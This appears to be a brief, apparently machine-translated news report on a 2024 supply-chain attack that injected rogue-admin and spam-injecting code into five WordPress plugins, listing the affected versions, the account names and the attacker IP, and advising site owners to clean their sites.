A recent attack targeted a few legitimate WordPress plugins by introducing harmful code that allowed the creation of unauthorized administrator accounts. This breach enabled attackers to carry out arbitrary actions on affected websites.
According to a report by Wordfence Safety Researcher Chastberlaine, the malware attempted to create new administrator accounts and send the data to a server controlled by the attackers. Additionally, the threat involved injecting malicious JavaScript into site footers, leading to the proliferation of Seo-Spam.
The compromised administrator accounts were named “Options” and “Pluginauth”, with their information being sent to the IP address 94.156.79 [.] 8.
While the exact method used by the attackers to compromise the plugins remains unknown, the initial signs of the attack were detected on June 21, 2024.
These plugins have now been removed from the WordPress catalog for further investigation:
- Social Warfare 4.4.6.4 – 4.4.7.1 (updated version: 4.4.7.3) – with over 30,000 installations;
- Blaze Widget 2.2.5 – 2.5.2 (updated version: 2.5.4) – with over 10 installations;
- Wrapper Link Elementor 1.0.2 – 1.0.3 (updated version: 1.0.5) – with over 1,000 installations;
- Contact Form 7 Multi-step Addon 1.0.4 – 1.0.5 (updated version: 1.0.7) – with over 700 installations;
- Simply Show Hooks 1.2.1 (no updated version available) – with over 4,000 installations.
Users of these plugins are advised to thoroughly check their websites for any suspicious administrator accounts and remove them, as well as eliminate any malicious code that may have been injected